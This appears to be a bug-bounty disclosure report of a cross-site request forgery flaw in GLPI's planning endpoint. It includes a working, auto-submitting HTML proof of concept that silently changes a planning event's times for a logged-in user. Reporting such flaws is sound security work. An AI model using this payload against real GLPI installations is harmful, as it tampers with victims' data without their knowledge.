Cross-Site Request Forgery (CSRF) in glpi-project/glpi
Valid
Reported on
Sep 13th 2021
✍️ Description
Hello dear glpi team I found one more CSRF vulnerability.
🕵️♂️ Proof of Concept
1.fisrt user already should be logged in In Firefox or safari.
2.Open the PoC.html and click on submit button ( Also it can be auto-submit)
3.Here a Planning start and end times with items_id 3will be changed after clicking on submit button on PoC.html file.
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://nocompany.with7.glpi-network.cloud/ajax/planning.php" method="POST">
<input type="hidden" name="action" value="update_event_times" />
<input type="hidden" name="start" value="2021-09-13T08:30:00.000Z" />
<input type="hidden" name="end" value="2021-09-13T12:00:00.000Z" />
<input type="hidden" name="itemtype" value="PlanningExternalEvent" />
<input type="hidden" name="items_id" value="3" />
<input type="hidden" name="move_instance" value="true" />
<input type="hidden" name="old_start" value="2021-09-13T08:30:00.000Z" />
<input type="hidden" name="new_actor_itemtype" value="" />
<input type="hidden" name="new_actor_items_id" value="" />
<input type="hidden" name="old_actor_itemtype" value="" />
<input type="hidden" name="old_actor_items_id" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
We have contacted a member of the
glpi-project/glpi
team and are waiting to hear back
2 years ago
to join this conversation